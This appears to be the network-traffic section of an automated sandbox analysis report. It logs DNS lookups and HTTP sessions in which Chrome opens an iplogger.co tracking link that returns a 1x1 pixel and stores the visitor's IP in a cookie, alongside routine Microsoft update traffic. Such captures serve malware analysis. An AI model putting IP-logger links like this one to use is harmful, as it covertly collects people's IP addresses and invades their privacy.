                                                                                        Nov 30, 2024 12:49:07.774745941 CET49911443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:49:07.774758101 CET4434991113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:49:07.774821997 CET49911443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:49:07.774950027 CET49911443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:49:07.774960995 CET4434991113.107.246.63192.168.2.4
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 30, 2024 12:47:06.805107117 CET5428453192.168.2.41.1.1.1
                                                                                        Nov 30, 2024 12:47:06.805150032 CET5363153192.168.2.41.1.1.1
                                                                                        Nov 30, 2024 12:47:06.948055983 CET53526291.1.1.1192.168.2.4
                                                                                        Nov 30, 2024 12:47:07.190859079 CET53505431.1.1.1192.168.2.4
                                                                                        Nov 30, 2024 12:47:07.190875053 CET53542841.1.1.1192.168.2.4
                                                                                        Nov 30, 2024 12:47:07.190891981 CET53536311.1.1.1192.168.2.4
                                                                                        Nov 30, 2024 12:47:09.822484970 CET53498931.1.1.1192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.281676054 CET6242953192.168.2.41.1.1.1
                                                                                        Nov 30, 2024 12:47:11.282016039 CET6082453192.168.2.41.1.1.1
                                                                                        Nov 30, 2024 12:47:11.421092987 CET53624291.1.1.1192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.423357964 CET53608241.1.1.1192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.485626936 CET5619153192.168.2.41.1.1.1
                                                                                        Nov 30, 2024 12:47:11.485873938 CET5479953192.168.2.41.1.1.1
                                                                                        Nov 30, 2024 12:47:11.624422073 CET53547991.1.1.1192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.624762058 CET53561911.1.1.1192.168.2.4
                                                                                        Nov 30, 2024 12:47:20.946995020 CET138138192.168.2.4192.168.2.255
                                                                                        Nov 30, 2024 12:47:26.889036894 CET53623021.1.1.1192.168.2.4
                                                                                        Nov 30, 2024 12:47:45.579875946 CET53499971.1.1.1192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.698477030 CET53605361.1.1.1192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.622802973 CET53623321.1.1.1192.168.2.4
                                                                                        Nov 30, 2024 12:48:37.078022957 CET53516401.1.1.1192.168.2.4
                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                        Nov 30, 2024 12:47:07.191071987 CET192.168.2.41.1.1.1c21b(Port unreachable)Destination Unreachable
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Nov 30, 2024 12:47:06.805107117 CET192.168.2.41.1.1.10x59d6Standard query (0)iplogger.coA (IP address)IN (0x0001)false
                                                                                        Nov 30, 2024 12:47:06.805150032 CET192.168.2.41.1.1.10xc13eStandard query (0)iplogger.co65IN (0x0001)false
                                                                                        Nov 30, 2024 12:47:11.281676054 CET192.168.2.41.1.1.10x1870Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                        Nov 30, 2024 12:47:11.282016039 CET192.168.2.41.1.1.10x1215Standard query (0)www.google.com65IN (0x0001)false
                                                                                        Nov 30, 2024 12:47:11.485626936 CET192.168.2.41.1.1.10xa9d2Standard query (0)iplogger.coA (IP address)IN (0x0001)false
                                                                                        Nov 30, 2024 12:47:11.485873938 CET192.168.2.41.1.1.10x33beStandard query (0)iplogger.co65IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Nov 30, 2024 12:47:07.190875053 CET1.1.1.1192.168.2.40x59d6No error (0)iplogger.co104.21.82.93A (IP address)IN (0x0001)false
                                                                                        Nov 30, 2024 12:47:07.190875053 CET1.1.1.1192.168.2.40x59d6No error (0)iplogger.co172.67.167.249A (IP address)IN (0x0001)false
                                                                                        Nov 30, 2024 12:47:07.190891981 CET1.1.1.1192.168.2.40xc13eNo error (0)iplogger.co65IN (0x0001)false
                                                                                        Nov 30, 2024 12:47:11.421092987 CET1.1.1.1192.168.2.40x1870No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                        Nov 30, 2024 12:47:11.423357964 CET1.1.1.1192.168.2.40x1215No error (0)www.google.com65IN (0x0001)false
                                                                                        Nov 30, 2024 12:47:11.624422073 CET1.1.1.1192.168.2.40x33beNo error (0)iplogger.co65IN (0x0001)false
                                                                                        Nov 30, 2024 12:47:11.624762058 CET1.1.1.1192.168.2.40xa9d2No error (0)iplogger.co172.67.167.249A (IP address)IN (0x0001)false
                                                                                        Nov 30, 2024 12:47:11.624762058 CET1.1.1.1192.168.2.40xa9d2No error (0)iplogger.co104.21.82.93A (IP address)IN (0x0001)false
                                                                                        • iplogger.co
                                                                                        • https:
                                                                                        • fs.microsoft.com
                                                                                        • slscr.update.microsoft.com
                                                                                        • otelrules.azureedge.net
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449740104.21.82.934436452C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:47:09 UTC660OUTGET /1tJFB4 HTTP/1.1
                                                                                        Host: iplogger.co
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-30 11:47:10 UTC1364INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:47:10 GMT
                                                                                        Content-Type: image/png
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: 56396975137264100=2; expires=Sun, 30 Nov 2025 11:47:10 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                        Set-Cookie: clhf03028ja=8.46.123.228; expires=Sun, 30 Nov 2025 11:47:10 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                        memory: 0.43326568603515625
                                                                                        expires: Sat, 30 Nov 2024 11:47:10 +0000
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        strict-transport-security: max-age=604800
                                                                                        strict-transport-security: max-age=31536000
                                                                                        content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                        x-frame-options: SAMEORIGIN
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E34TOgWh7XNAC1MAFHcJezNiZgpWZLKVL%2FYNZ1p12%2BctjMJm7%2Ba5HH%2FU1ijWNJGrrTBtsfPw5eQHjzf%2BVIt8Kz%2F0olHrBIMC9blNn506Jh0b%2FviSyqnGyo6mByTfGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8eaa99e33ed16a4e-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1739&rtt_var=667&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1238&delivery_rate=1621321&cwnd=202&unsent_bytes=0&cid=88127d69b7e146a5&ts=825&x=0"
                                                                                        2024-11-30 11:47:10 UTC5INData Raw: 37 34 0d 0a 89
                                                                                        Data Ascii: 74
                                                                                        2024-11-30 11:47:10 UTC117INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                        Data Ascii: PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                        2024-11-30 11:47:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449739104.21.82.934436452C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:47:10 UTC639OUTGET /favicon.ico HTTP/1.1
                                                                                        Host: iplogger.co
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://iplogger.co/1tJFB4
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: 56396975137264100=2; clhf03028ja=8.46.123.228
                                                                                        2024-11-30 11:47:11 UTC1088INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:47:11 GMT
                                                                                        Content-Type: image/x-icon
                                                                                        Content-Length: 2833
                                                                                        Connection: close
                                                                                        last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                        etag: "629f3a26-b11"
                                                                                        strict-transport-security: max-age=604800
                                                                                        strict-transport-security: max-age=31536000
                                                                                        content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                        x-frame-options: SAMEORIGIN
                                                                                        Cache-Control: max-age=14400
                                                                                        CF-Cache-Status: REVALIDATED
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aCGMAwSbMJEAkg4EFOZa4TA14S2YuEifs%2FItzRysz13NCBIMSo%2BG6hxqoeZFtjSOSKU9E51ve6kMBIlmh5%2BFpFMk7rxybLszCYdyzWPBT632bBK5Hx%2FyE%2BkeiRQZgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8eaa99e9092b7ce8-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2039&min_rtt=2033&rtt_var=775&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1217&delivery_rate=1399808&cwnd=195&unsent_bytes=0&cid=c51c7023db11d027&ts=1700&x=0"
                                                                                        2024-11-30 11:47:11 UTC281INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                                                                                        Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                                                                                        2024-11-30 11:47:11 UTC1369INData Raw: 80 39 de dd c0 d5 c0 c5 c0 d2 56 8c 8b 30 e9 58 e0 9b c0 16 60 28 96 d3 0f 00 a9 54 48 1d 69 d5 03 e6 04 6f 3a bf 04 b8 17 f8 27 70 33 ad 5b fc 4c 78 10 71 fa 31 90 8d e5 f4 96 58 4e 2f 6a c5 a0 4d c1 9b ce b7 79 d3 f9 2b 81 7f 00 d7 21 72 bd 50 e8 06 1e 00 de 88 e5 f4 a9 46 91 36 85 a6 18 e0 4d e7 57 00 2f 22 bb 51 4b c6 17 02 ab 80 3f 02 f7 c5 72 ba a9 0d b0 66 80 37 9d 3f 07 d1 d0 a7 37 f3 c0 79 40 1b f0 2d 60 20 96 d3 c7 da 12 bb 66 80 37 9d f7 78 d3 f9 eb 80 df f2 d1 ee 7a 2d 9c 08 bc 16 cb e9 75 36 44 ae 18 e0 4d e7 3d c0 36 44 d9 f9 ec e7 b6 60 58 02 fc 3e 96 d3 e7 b8 d5 0b 0d 19 60 16 7f 1b d0 3f b7 b9 2d 18 da 81 a7 81 73 dc dc 5c 97 01 c6 be 5f 8f 98 b7 56 63 ce 26 b8 0e 16 01 8f c7 72 7a 4d a3 1b 1b 39 42 e7 01 b7 b7 64 4a 70 18 d8 03 bc 05 fc
                                                                                        Data Ascii: 9V0X`(THio:'p3[Lxq1XN/jMy+!rPF6MW/"QK?rf7?7y@-` f7xz-u6DM=6D`X>`?-s\_Vc&rzM9BdJp
                                                                                        2024-11-30 11:47:11 UTC1183INData Raw: 3a 3f c6 47 2b 06 43 54 42 67 9b 68 10 24 7d 7f d4 6c bc 62 49 bc d9 5c 73 c0 33 96 b4 ad c4 7d c5 4c a2 6c 5a 65 dc e6 11 41 ac c6 34 06 bc 4e c5 94 b8 c1 05 de 74 be db c8 de 36 ea 87 ad f3 85 21 20 65 be af 03 56 58 d0 be 8d d1 7b 1e 90 86 45 84 09 6e d1 01 6c f5 a6 f3 14 33 89 bd c0 76 0b da 56 60 0a b8 a6 98 49 38 8c 7f 09 38 1f 78 d7 25 fd b3 4e 99 ac da 73 7a dc 72 12 97 00 9f 31 df b7 21 95 97 85 c2 76 60 67 b2 a0 49 16 b4 2f 15 52 e5 54 48 3d 03 7c 1a b8 09 63 e3 6b 60 0a c9 31 00 d3 19 b0 a3 01 e1 4c f8 80 9f 7a d3 f9 76 b3 13 5f 01 f6 37 a0 69 05 76 00 5b 8d f8 ad 02 b2 c9 82 de 62 18 31 9e 0a a9 3b 81 e3 90 8c d1 6c 0e de 2e 24 85 0e 7c b8 34 f6 20 d2 a1 69 83 47 81 cd a6 36 70 2c 52 1b 08 59 8e e1 16 cf 00 17 15 33 89 f1 64 41 2f 46 8a 30 8e
                                                                                        Data Ascii: :?G+CTBgh$}lbI\s3}LlZeA4Nt6! eVX{Enl3vV`I88x%Nszr1!v`gI/RTH=|ck`1Lzv_7iv[b1;l.$|4 iG6p,RY3dA/F0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.44974423.218.208.109443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:47:13 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept: */*
                                                                                        Accept-Encoding: identity
                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                        Host: fs.microsoft.com
                                                                                        2024-11-30 11:47:13 UTC478INHTTP/1.1 200 OK
                                                                                        Content-Type: application/octet-stream
                                                                                        Server: Kestrel
                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                        X-Ms-Region: prod-weu-z1
                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                        X-OSID: 2
                                                                                        X-CID: 2
                                                                                        X-CCC: GB
                                                                                        Cache-Control: public, max-age=53564
                                                                                        Date: Sat, 30 Nov 2024 11:47:13 GMT
                                                                                        Connection: close
                                                                                        X-CID: 2


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.449745172.67.167.2494436452C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:47:14 UTC401OUTGET /favicon.ico HTTP/1.1
                                                                                        Host: iplogger.co
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: 56396975137264100=2; clhf03028ja=8.46.123.228
                                                                                        2024-11-30 11:47:14 UTC1088INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:47:14 GMT
                                                                                        Content-Type: image/x-icon
                                                                                        Content-Length: 2833
                                                                                        Connection: close
                                                                                        last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                        etag: "629f3a26-b11"
                                                                                        strict-transport-security: max-age=604800
                                                                                        strict-transport-security: max-age=31536000
                                                                                        content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                        x-frame-options: SAMEORIGIN
                                                                                        Cache-Control: max-age=14400
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 3
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XnQWHjunWF6U3QlofhFj54ZWrZiJMF6YDSk7nytF6BzvOrnTnRX5H%2FQ%2Bmaqfc1VRttsoUcSLwYhoI7Ud6%2Bf%2F%2Bk5FEpNR5bIei9crmULCp6HDNzakCl0HICAOooi%2BZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8eaa99ff4cbc0c7a-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1673&rtt_var=694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=979&delivery_rate=1745367&cwnd=194&unsent_bytes=0&cid=cb9e5fbf628c480f&ts=459&x=0"
                                                                                        2024-11-30 11:47:14 UTC281INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                                                                                        Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                                                                                        2024-11-30 11:47:14 UTC1369INData Raw: 80 39 de dd c0 d5 c0 c5 c0 d2 56 8c 8b 30 e9 58 e0 9b c0 16 60 28 96 d3 0f 00 a9 54 48 1d 69 d5 03 e6 04 6f 3a bf 04 b8 17 f8 27 70 33 ad 5b fc 4c 78 10 71 fa 31 90 8d e5 f4 96 58 4e 2f 6a c5 a0 4d c1 9b ce b7 79 d3 f9 2b 81 7f 00 d7 21 72 bd 50 e8 06 1e 00 de 88 e5 f4 a9 46 91 36 85 a6 18 e0 4d e7 57 00 2f 22 bb 51 4b c6 17 02 ab 80 3f 02 f7 c5 72 ba a9 0d b0 66 80 37 9d 3f 07 d1 d0 a7 37 f3 c0 79 40 1b f0 2d 60 20 96 d3 c7 da 12 bb 66 80 37 9d f7 78 d3 f9 eb 80 df f2 d1 ee 7a 2d 9c 08 bc 16 cb e9 75 36 44 ae 18 e0 4d e7 3d c0 36 44 d9 f9 ec e7 b6 60 58 02 fc 3e 96 d3 e7 b8 d5 0b 0d 19 60 16 7f 1b d0 3f b7 b9 2d 18 da 81 a7 81 73 dc dc 5c 97 01 c6 be 5f 8f 98 b7 56 63 ce 26 b8 0e 16 01 8f c7 72 7a 4d a3 1b 1b 39 42 e7 01 b7 b7 64 4a 70 18 d8 03 bc 05 fc
                                                                                        Data Ascii: 9V0X`(THio:'p3[Lxq1XN/jMy+!rPF6MW/"QK?rf7?7y@-` f7xz-u6DM=6D`X>`?-s\_Vc&rzM9BdJp
                                                                                        2024-11-30 11:47:14 UTC1183INData Raw: 3a 3f c6 47 2b 06 43 54 42 67 9b 68 10 24 7d 7f d4 6c bc 62 49 bc d9 5c 73 c0 33 96 b4 ad c4 7d c5 4c a2 6c 5a 65 dc e6 11 41 ac c6 34 06 bc 4e c5 94 b8 c1 05 de 74 be db c8 de 36 ea 87 ad f3 85 21 20 65 be af 03 56 58 d0 be 8d d1 7b 1e 90 86 45 84 09 6e d1 01 6c f5 a6 f3 14 33 89 bd c0 76 0b da 56 60 0a b8 a6 98 49 38 8c 7f 09 38 1f 78 d7 25 fd b3 4e 99 ac da 73 7a dc 72 12 97 00 9f 31 df b7 21 95 97 85 c2 76 60 67 b2 a0 49 16 b4 2f 15 52 e5 54 48 3d 03 7c 1a b8 09 63 e3 6b 60 0a c9 31 00 d3 19 b0 a3 01 e1 4c f8 80 9f 7a d3 f9 76 b3 13 5f 01 f6 37 a0 69 05 76 00 5b 8d f8 ad 02 b2 c9 82 de 62 18 31 9e 0a a9 3b 81 e3 90 8c d1 6c 0e de 2e 24 85 0e 7c b8 34 f6 20 d2 a1 69 83 47 81 cd a6 36 70 2c 52 1b 08 59 8e e1 16 cf 00 17 15 33 89 f1 64 41 2f 46 8a 30 8e
                                                                                        Data Ascii: :?G+CTBgh$}lbI\s3}LlZeA4Nt6! eVX{Enl3vV`I88x%Nszr1!v`gI/RTH=|ck`1Lzv_7iv[b1;l.$|4 iG6p,RY3dA/F0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.44974623.218.208.109443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:47:15 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept: */*
                                                                                        Accept-Encoding: identity
                                                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                        Range: bytes=0-2147483646
                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                        Host: fs.microsoft.com
                                                                                        2024-11-30 11:47:15 UTC535INHTTP/1.1 200 OK
                                                                                        Content-Type: application/octet-stream
                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                        ApiVersion: Distribute 1.1
                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                        X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                        Cache-Control: public, max-age=113331
                                                                                        Date: Sat, 30 Nov 2024 11:47:15 GMT
                                                                                        Content-Length: 55
                                                                                        Connection: close
                                                                                        X-CID: 2
                                                                                        2024-11-30 11:47:15 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.449747172.202.163.200443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:47:18 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UdDeAusWWV4YHsm&MD=+XvgSgZm HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept: */*
                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                        Host: slscr.update.microsoft.com
                                                                                        2024-11-30 11:47:19 UTC560INHTTP/1.1 200 OK
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Content-Type: application/octet-stream
                                                                                        Expires: -1
                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                        MS-CorrelationId: 8b511300-6108-4a18-a246-288975d96734
                                                                                        MS-RequestId: 1ede34ab-8326-4901-8f90-06f3d5bccff0
                                                                                        MS-CV: JECpPC8NSECqmp68.0
                                                                                        X-Microsoft-SLSClientCache: 2880
                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Date: Sat, 30 Nov 2024 11:47:18 GMT
                                                                                        Connection: close
                                                                                        Content-Length: 24490
                                                                                        2024-11-30 11:47:19 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
